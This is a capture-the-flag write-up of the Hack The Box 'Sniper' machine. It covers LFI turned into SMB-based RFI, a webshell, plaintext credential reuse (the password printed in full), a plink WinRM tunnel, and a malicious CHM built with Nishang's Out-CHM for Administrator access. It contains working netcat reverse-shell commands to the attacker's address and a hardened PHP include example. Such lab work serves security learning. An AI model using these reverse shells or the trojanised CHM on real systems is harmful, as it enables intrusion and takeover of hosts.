Quick Summary
→ Sniper is another Windows machine that can be approached in an unintended way. The PHP web application is vulnerable to LFI (Local File Inclusion), which can be turned into RFI (Remote File Inclusion). Since this is a Windows box, I set up a Samba share and used the RFI to include a webshell, then uploaded an executable to get a reverse shell back to my Kali Linux machine. During reconnaissance I found a file in the web root containing user credentials; the password is stored in plaintext, so I wrapped it in a PSCredential from PowerShell and used it to run the executable I had uploaded as that user. The machine creator left a note.txt in a file directory (C:\Docs), which is hint enough. Creating the malicious payload from my Windows host with PowerShell was not easy, as Windows kept rejecting the script file, but I eventually managed to create a malicious CHM file and got Administrator.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ Discover open ports and the services running on them
Enumeration
→ Browse the HTTP service
→ Enumerate SMB on port 445
→ Brute-force the web page directories
Post - Exploitation
→ Find and confirm the Local File Inclusion in the blog's language parameter
→ Set up a Samba share and include a webshell from it (LFI to RFI)
→ Use AccessChk from Sysinternals to check which directories the Users group can write to
→ Retrieve user credentials from the web source in inetpub
Exploitation
→ Method #1: Find the locally listening WinRM port (5985), forward it to my machine with plink, and log in as Chris with Evil-WinRM
→ Method #2: Wrap the plaintext password in a PSCredential with PowerShell and use Invoke-Command to run nc.exe as Chris for a reverse shell
→ Finally get user.txt
Privilege Escalation
→ Enumerate the file directories
→ Read note.txt, which gives the hint
→ Create a malicious CHM file in PowerShell with Out-CHM.ps1 from Nishang
→ Transfer it to C:\Docs on the Sniper machine, where the Administrator checks for and opens documents
→ Set up a netcat listener
→ Gain the Administrator shell
Walkthrough
Network Scanning
→ First, I run Nmap to scan the target and get information about the services running on the target machine. I use:
- -sV ⇒ probe open ports to determine service/version info
- -sC ⇒ equivalent to --script=default
- -T 0-5 ⇒ set the timing template (higher is faster, less accurate)
- -p- ⇒ scan all 65535 ports
- -oN ⇒ save the scan results to a text file
nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
root in htb/boxes/Sniper ❯ nmap -sV -sC -T4 -p- 10.10.10.151 -oN nmap-Sniper
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-26 23:52 PST
Nmap scan report for 10.10.10.151
Host is up (0.22s latency).
Not shown: 65530 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49667/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m31s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-26T23:03:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 562.35 seconds
root in htb/boxes/Sniper took 9m22s ❯
Nmap results
So these ports are open:
- 80 ⇒ HTTP, Microsoft IIS 10.0 hosting the web page
- 135 ⇒ Windows RPC endpoint mapper
- 139 ⇒ NetBIOS session service
- 445 ⇒ SMB (the default port)
- 49667 ⇒ another Windows RPC port
The SMB host script also reports that message signing is enabled but not required.
Enumeration
The first thing I did was connect to the machine over SMB on port 445 with smbclient and try an anonymous (null session) login, but that is not allowed.
root in htb/boxes/Sniper ❯ smbclient -L 10.10.10.151 -U ""
Enter WORKGROUP\'s password:
session setup failed: NT_STATUS_LOGON_FAILURE
root in htb/boxes/Sniper took 3s ❯
Next I used enum4linux, a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts, but that did not work either: without a null session it aborts the rest of its checks.
root in htb/boxes/Sniper ❯ enum4linux -o -U -G -S -P 10.10.10.151
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 28 03:56:55 2020

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.151
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ====================================================
|    Enumerating Workgroup/Domain on 10.10.10.151    |
 ====================================================
[E] Can't find workgroup/domain

 =====================================
|    Session Check on 10.10.10.151    |
 =====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
root in htb/boxes/Sniper took 11s ❯
Scan Web page directories
So I will leave SMB enumeration for a while and look at what is on the web page. I use the dirsearch web path scanner to see if it turns up anything useful:
root in ~/htb/vpn ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.151/" -e php,txt -x 301,302,403,404 --simple-report=sniper-directories

dirsearch v0.3.9
Extensions: php, txt | HTTP method: get | Threads: 10 | Wordlist size: 6417
Error Log: /opt/dirsearch/logs/errors-20-03-28_02-20-51.log
Target: http://10.10.10.151/

[02:20:51] Starting:
[02:22:59] 200 -   3KB - /index.php
[02:22:59] 200 -   3KB - /INDEX.PHP
[02:22:59] 200 -   3KB - /index.PHP
[02:22:59] 200 -   3KB - /index.php/login/
[02:24:19] 200 -   5KB - /user/login.php
Task Completed
root in ~/htb/vpn took 3m38s ❯
Sniper Web Page
So there is a login page at /user/login.php which caught my attention. I tried admin:admin as username and password and it redirected me to an "Under Construction" page.
I realised this page is just a rabbit hole (no hints in the page source), so I went on to enumerate the rest of the site at http://10.10.10.151.
Post - Exploitation
LFI | Local File Inclusion
After more enumeration of the web page I found an interesting feature in the Services section: a link to change the language. What makes it interesting is that, unlike a site where you right-click and let the browser translate, here a PHP file is selected by a lang parameter, e.g. lang=blog-en.php. The parameter names a file, so the question is whether it is validated at all.
When I inject a single ' into lang=blog-en.php the page returns an error, which suggests the parameter is passed straight into an include and is vulnerable to LFI (Local File Inclusion).
To confirm the LFI, I put this value in lang=:
⇒ \windows\system32\drivers\etc\hosts
Looking at the page source, the contents of the hosts file appear in the response. The path that worked is a Windows path, so this is PHP running on IIS on Windows, which matters for the next step.
RFI | Remote File Inclusion
I searched Google for an LFI-to-RFI article and found a good one (see the references). On Windows, PHP's include() accepts a UNC path such as \\attacker\share\file.php as an ordinary filesystem path, so even when allow_url_include is off and http:// wrappers are blocked, a file served from my own SMB share can still be included. That is how the LFI becomes an RFI and lets me inject a webshell.
I set up my Samba share based on the article with this configuration in /etc/samba/smb.conf:
[global]
   workgroup = WORKGROUP
   server string = Samba Server %v
   netbios name = Payas0
   security = user
   map to guest = bad user
   name resolve order = bcast host
   dns proxy = no
   bind interfaces only = yes

[medz]
   path = /root/htb/boxes/Sniper/
   writable = no
   guest ok = yes
   guest only = yes
   read only = yes
   directory mode = 0555
   force user = nobody
Everything under that path is readable by the target as guest, so keep only the files you intend to serve in it.
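As an added example (not code from the box or from this write-up's author), here is what the vulnerable include pattern described above looks like in PHP, next to a hardened version. The file name index.php, the lang/ directory and the language map are assumptions; only the lang= parameter and the probe values are taken from the write-up.

```php
<?php
// Added example: a reconstruction of the include pattern the write-up
// describes, not the Sniper site's actual source. Assumed file: blog/index.php
// called as /blog/?lang=blog-en.php.

// --- Vulnerable form: the request parameter is the include path. ---
function render_language_vulnerable(string $lang): void
{
    // lang=\windows\system32\drivers\etc\hosts  -> local file inclusion
    // lang=\\10.10.14.216\medz\shell.php         -> remote inclusion over SMB
    // The UNC form works on Windows even with allow_url_include=Off, because
    // \\host\share\file is a filesystem path, not a URL wrapper (http://, ftp://).
    include $lang;
}

// --- Hardened form: the parameter selects a key, never a path. ---
// Assumed language files; the real site's files are not known from the write-up.
const LANGUAGE_FILES = [
    'en' => __DIR__ . '/lang/blog-en.php',
    'es' => __DIR__ . '/lang/blog-es.php',
    'fr' => __DIR__ . '/lang/blog-fr.php',
];

// Returns the file for a known language key, or null for anything else.
// No normalisation of the input is attempted: an exact-match lookup means
// traversal sequences, drive letters and UNC prefixes never reach include().
function resolve_language_file(string $lang): ?string
{
    return LANGUAGE_FILES[$lang] ?? null;
}

function render_language_hardened(string $lang): void
{
    $file = resolve_language_file($lang);
    if ($file === null || !is_file($file)) {
        http_response_code(400);
        echo 'unsupported language';
        return;
    }
    include $file;
}

// Constructed probes modelled on the write-up's payloads (PHP single quotes:
// '\\' is one backslash, so '\\\\host' is the UNC prefix \\host).
$probes = [
    'en',
    'blog-en.php',
    '\\windows\\system32\\drivers\\etc\\hosts',
    '\\\\10.10.14.216\\medz\\shell.php',
    '..\\..\\user\\db.php',
];

if (PHP_SAPI === 'cli') {
    // Offline check: every probe except the key 'en' is rejected.
    foreach ($probes as $probe) {
        $verdict = resolve_language_file($probe) === null ? 'rejected' : 'allowed';
        printf("%-42s %s\n", $probe, $verdict);
    }
} else {
    render_language_hardened((string) ($_GET['lang'] ?? ''));
}
```

Run it with php index.php to see each probe's verdict. The point that matters on Windows hosts is in the comments: allow_url_include=Off stops http:// and ftp:// wrappers but not UNC paths, because \\host\share\file goes through the filesystem layer. Restricting the include to a fixed map closes both the LFI and the SMB-based RFI; setting open_basedir to the web root is a useful second layer, since a UNC path falls outside it.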
Now that everything looks fine, I restart Samba and do the RFI. To take control of the web server I use the Winter webshell (see the references) so I can upload my payload and execute a reverse shell. I point the lang parameter at my share:
lang=\\10.10.14.216\medz\shell.php
Then I make a custom directory on C: named payas0 and upload nc.exe to C:\payas0.
Now everything is set, I execute nc.exe with my IP and port 9001 and pop a PowerShell:
# powershell
C:\payas0\nc.exe 10.10.14.216 9001 -e powershell.exe
After executing this I have an initial shell ;) It runs as nt authority\iusr, the IIS anonymous account, so it only has that account's limited rights.
# powershell
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 50340
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\payas0> whoami
whoami
nt authority\iusr
PS C:\payas0> hostname
hostname
Sniper
PS C:\payas0>
Enumerating SNIPER machine
I start enumerating again. First I look at which local users exist, with the PowerShell command Get-WmiObject -Class Win32_UserAccount:
# powershell
PS C:\payas0> Get-WmiObject -Class Win32_UserAccount
Get-WmiObject -Class Win32_UserAccount

AccountType : 512
Caption     : SNIPER\Administrator
Domain      : SNIPER
SID         : S-1-5-21-3952461944-2550723483-3555184078-500
FullName    :
Name        : Administrator

AccountType : 512
Caption     : SNIPER\Chris
Domain      : SNIPER
SID         : S-1-5-21-3952461944-2550723483-3555184078-1000
FullName    :
Name        : Chris

AccountType : 512
Caption     : SNIPER\DefaultAccount
Domain      : SNIPER
SID         : S-1-5-21-3952461944-2550723483-3555184078-503
FullName    :
Name        : DefaultAccount

AccountType : 512
Caption     : SNIPER\Guest
Domain      : SNIPER
SID         : S-1-5-21-3952461944-2550723483-3555184078-501
FullName    :
Name        : Guest

AccountType : 512
Caption     : SNIPER\WDAGUtilityAccount
Domain      : SNIPER
SID         : S-1-5-21-3952461944-2550723483-3555184078-504
FullName    :
Name        : WDAGUtilityAccount

PS C:\payas0>
So there is a local user named Chris (RID 1000, a regular account rather than a built-in one). Next I checked which paths the Users group can write to with AccessChk from Sysinternals, uploaded to C:\payas0 (-u suppress errors, -w writable only, -q quiet, -s recurse):
# powershell
PS C:\payas0> .\accesschk.exe -uwqs Users C:\*.* /accepteula
.\accesschk.exe -uwqs Users C:\*.* /accepteula

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

RW C:\$Recycle.Bin
RW C:\Microsoft
RW C:\payas0
RW C:\ProgramData
RW C:\Temp
RW C:\Microsoft\Windows
RW C:\Microsoft\Windows\Powershell
RW C:\payas0\Microsoft
RW C:\payas0\Microsoft\Windows
RW C:\payas0\Microsoft\Windows\Powershell
RW C:\ProgramData\Data
RW C:\ProgramData\MySQL
RW C:\ProgramData\USOShared
RW C:\ProgramData\VMWare
RW C:\ProgramData\Data\#innodb_temp
RW C:\ProgramData\Data\mysql
RW C:\ProgramData\Data\
RW C:\ProgramData\Data\perfomance_schema
RW C:\ProgramData\Data\sniper
RW C:\ProgramData\Data\sys
RW C:\ProgramData\Microsoft\DeviceSync
RW C:\ProgramData\Microsoft\User Account Pictures
RW C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys
RW C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
RW C:\ProgramData\Microsoft\DRM\Server
RW C:\ProgramData\Microsoft\NetFramework\Breadcrumbstore
RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache
RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads
RW C:\ProgramData\Microsoft\WinMSIPC\Server
Second, I visit the inetpub directory, where the website and its source code live, and I am lucky: there is an interesting file at C:\inetpub\wwwroot\user\db.php which contains database credentials. The DB connection string in db.php holds a plaintext password, 36mEAhz/B8xQ~2VM, and it turns out that this is also the Windows password of user Chris (password reuse). Credentials found in web source are always worth trying against every account turned up during enumeration.
Exploitation
Getting a shell as user Chris
Method #1
I wanted to use those credentials with Evil-WinRM to log in as Chris and get user.txt. WinRM listens on port 5985, but the Nmap scan did not show it: netstat -ano in the shell shows 5985 listening, so it is reachable only from the box itself (filtered from outside). Port forwarding solves that. I uploaded the plink.exe Windows binary to Sniper and opened a reverse SSH tunnel back to my machine (my Kali box runs an SSH server with a throwaway account, nulldev, for this), so that 127.0.0.1:5985 on my side reaches WinRM on Sniper. Note that -pw puts the password on the command line, visible in the process list, which is why the account should be a disposable one.
PS C:\payas0> .\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
.\plink.exe -l nulldev -pw nulldev -R 5985:127.0.0.1:5985 10.10.14.216
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 81:c9:32:5d:2e:03:3c:1d:72:8a:54:45:ed:0b:08:4b
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y
Linux Payas0 5.4.0-kali2-amd64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 28 05:30:42 2020 from 10.10.10.151
Could not chdir to home directory /home/nulldev: No such file or directory
$ whoami
whoami
nulldev
$ su root
Password: "------------"
nulldev on Payas0 ❯
Now that the tunnel is up, I log in as Chris through 127.0.0.1:5985 with the db.php password and read user.txt:
# bash
nulldev on Payas0 in evil-winrm on master via 💎 v2.5.7 ❯ ruby evil-winrm.rb -i 127.0.0.1 -u Chris -p '36mEAhz/B8xQ~2VM' -s ./ -e ./

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chris\Documents> cd ..
*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         4/9/2019   6:47 AM                Administrator
d-----        4/11/2019   7:04 AM                Chris
d-r---         4/9/2019   6:47 AM                Public

*Evil-WinRM* PS C:\Users> cd Chris\Desktop
*Evil-WinRM* PS C:\Users\Chris\Desktop> dir

    Directory: C:\Users\Chris\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:15 AM             32 user.txt

*Evil-WinRM* PS C:\Users\Chris\Desktop> more user.txt
21f4[----------------------]cf56e
*Evil-WinRM* PS C:\Users\Chris\Desktop>
Method #2
Yes, there is a second way to get user.txt, and it is less hassle than port forwarding: run a command as Chris straight from the IUSR PowerShell session, using a PSCredential and Invoke-Command against the box's own WinRM endpoint. First I grant full control on my payas0 folder with icacls, then start a netcat listener on Kali (nc -lnvp 4444):
# powershell
PS C:\inetpub\wwwroot\user> icacls "C:\payas0" /grant iusr:F
icacls "C:\payas0" /grant iusr:F
processed file: C:\payas0
Successfully processed 1 files; Failed processing 0 files
Then run the script. The password from db.php is already plaintext; ConvertTo-SecureString just turns it into the SecureString that the PSCredential constructor requires:
# powershell
# Local account in MACHINE\user form. A single backslash is correct here:
# in a PowerShell double-quoted string "\\" is two literal backslashes.
$user = "SNIPER\Chris"
$password = "36mEAhz/B8xQ~2VM"
# Wrap the plaintext password as a SecureString for the PSCredential constructor.
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
# Invoke-Command with explicit credentials authenticates to the local WinRM
# service (the one listening on 5985) and runs the script block as Chris.
Invoke-Command -ComputerName SNIPER -Credential $credential -ScriptBlock { C:\payas0\nc.exe -e cmd.exe 10.10.14.216 4444 }
After executing the last command I have a shell again (the second one), and this one is as Chris:
# powershell
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.216] from (UNKNOWN) [10.10.10.151] 49835
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Chris\Documents>whoami & hostname
whoami & hostname
sniper\chris
Sniper

C:\Users\Chris\Documents>
Privilege Escalation
Enumeration begins again, but this time it is easy, as everything I need sits in the top-level directories. In C:\Docs there is a note.txt left by the "boss":
# powershell
C:\Users\Chris\Desktop>cd \Docs
cd \Docs

C:\Docs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Docs

03/28/2020  12:46 AM    <DIR>          .
03/28/2020  12:46 AM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,953,026,048 bytes free

Note.txt
What is in note.txt? This:
# powershell
C:\Docs>more note.txt
more note.txt
Hi Chris,
	Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

C:\Docs>

So the hint is in the note: "I hope that you've prepared the documentation for our new app. Drop it here when you're done with it."
Whatever gets dropped in C:\Docs is presumably checked and opened by the Administrator, so a document format that runs code when opened is the way in.
CHM File
Next, in the C:\Users\Chris\Downloads directory there is a CHM (compiled HTML Help) file, instructions.chm:
# powershell
C:\Docs>cd \Users\Chris\Downloads
cd \Users\Chris\Downloads

C:\Users\Chris\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Users\Chris\Downloads

03/27/2020  11:46 PM    <DIR>          .
03/27/2020  11:46 PM    <DIR>          ..
03/27/2020  11:46 PM               281 a.html
04/11/2019  08:36 AM            10,462 instructions.chm
               2 File(s)         10,743 bytes
               2 Dir(s)  17,945,899,008 bytes free

C:\Users\Chris\Downloads>
Generate Malicious CHM File
To view the CHM file you need to open it on Windows, so I transferred it to my Windows machine. It is exactly the documentation for the app that the Sniper CEO asked for. The plan: the Administrator will check C:\Docs and open the CHM, and a CHM can carry a payload that is triggered when it is opened.
This was new to me, I had never dealt with CHM files, so I did some research and found that you can create a malicious CHM file with Nishang's Out-CHM.ps1.
I first tried to download Out-CHM.ps1 on my Windows box, but it was rejected as a virus. Creating the malicious CHM file was a struggle: Windows kept denying it even with Windows Security disabled for a while, and PowerShell kept refusing to run the script.
# powershell
PS C:\Users\Medz\Documents\sniper> import-module Out-CHM.ps1
..\Out-CHM.ps1 : The term 'Out-CHM.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ ..\Out-CHM.ps1
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Out-CHM.ps1:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS C:\Users\Medz\Documents\sniper>
(The message above is a "not recognized" path error; the module loads once it is referenced by path as .\Out-CHM.ps1, as below.)
But I managed it by starting PowerShell with the execution policy bypassed:
# powershell
PS C:\Users\Medz\Documents\sniper> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https:

PS C:\Users\Medz\Documents\sniper>
Before generating a CHM file, we need to download and install HTML Help Workshop from Microsoft (htmlhelp.exe). This creates the folder C:\Program Files (x86)\HTML Help Workshop with the compiler (hhc.exe) that Out-CHM needs to build the .chm file.
Finally, I can create the CHM file. The payload runs nc.exe (already in C:\payas0 on the target) back to my listener on port 1234:
# powershell
PS C:\Users\Medz\Documents\sniper> import-module .\Out-CHM.ps1
PS C:\Users\Medz\Documents\sniper> Out-CHM -Payload "C:\payas0\nc.exe 10.10.14.216 1234 -e cmd.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\Medz\Documents\sniper\doc.chm

Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics

Created c:\Users\Medz\Documents\sniper\doc.chm, 13,448 bytes
Compression increased file by 280 bytes.
PS C:\Users\Medz\Documents\sniper> dir

    Directory: C:\Users\Medz\Documents\sniper

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/30/2019  10:58 PM                Basic Linux Privilege Escalation_files
-a----        6/30/2019  10:58 PM          56717 Basic Linux Privilege Escalation.html
-a----        3/29/2020   3:20 AM          13448 doc.chm
-a----        3/29/2020   3:05 AM          19502 Out-CHM.ps1

PS C:\Users\Medz\Documents\sniper>
Gain the Administrator Shell
Done! Now I upload doc.chm into the C:\Docs directory of the Sniper machine, copying it straight from my Samba share:
# powershell
C:\Docs>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Docs

03/28/2020  07:19 PM    <DIR>          .
03/28/2020  07:19 PM    <DIR>          ..
04/11/2019  09:31 AM               285 note.txt
04/11/2019  09:17 AM           552,607 php for dummies-trial.pdf
               2 File(s)        552,892 bytes
               2 Dir(s)  17,987,465,216 bytes free

C:\Docs>copy \\10.10.15.33\medz\doc.chm .
copy \\10.10.15.33\medz\doc.chm .
        1 file(s) copied.

C:\Docs>
Once doc.chm is in Docs, I set up a netcat listener on the port I baked into the malicious CHM and wait for the Administrator to check the folder and open it. Note that my VPN address differs between sessions (10.10.14.216 in the Out-CHM command above, 10.10.15.33 here): the address compiled into the payload must match the listener's address at the time the file is opened, so the CHM has to be rebuilt whenever the address changes.
Root
After 2-3 minutes I have the Administrator shell! Very nice box!
# bash
root in htb/boxes/Sniper via 🐘 v7.3.15 ❯ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.15.33] from (UNKNOWN) [10.10.10.151] 49703
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami & hostname
whoami & hostname
sniper\administrator
Sniper

C:\Windows\system32>
Get the root.txt
# bash
C:\Windows\system32>cd \Users\Administrator
cd \Users\Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Users\Administrator

04/09/2019  06:47 AM    <DIR>          .
04/09/2019  06:47 AM    <DIR>          ..
08/14/2019  10:38 PM    <DIR>          3D Objects
08/14/2019  10:38 PM    <DIR>          Contacts
10/01/2019  08:44 AM    <DIR>          Desktop
08/14/2019  10:38 PM    <DIR>          Documents
08/14/2019  10:38 PM    <DIR>          Downloads
08/14/2019  10:38 PM    <DIR>          Favorites
08/14/2019  10:38 PM    <DIR>          Links
08/14/2019  10:38 PM    <DIR>          Music
08/14/2019  10:38 PM    <DIR>          Pictures
08/14/2019  10:38 PM    <DIR>          Saved Games
08/14/2019  10:38 PM    <DIR>          Searches
08/14/2019  10:38 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  17,986,367,488 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 6A2B-2640

 Directory of C:\Users\Administrator\Desktop

10/01/2019  08:44 AM    <DIR>          .
10/01/2019  08:44 AM    <DIR>          ..
04/11/2019  08:13 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,986,367,488 bytes free

C:\Users\Administrator\Desktop>more root.txt
more root.txt
5624c[-------------------]436c15

C:\Users\Administrator\Desktop>
If you liked my writeup please leave a respect on my Profile
References:
- LFI to RFI
- WebShell for Windows
- AccessChk (Sysinternals)
- HTML Help Workshop
- Nishang - Out-CHM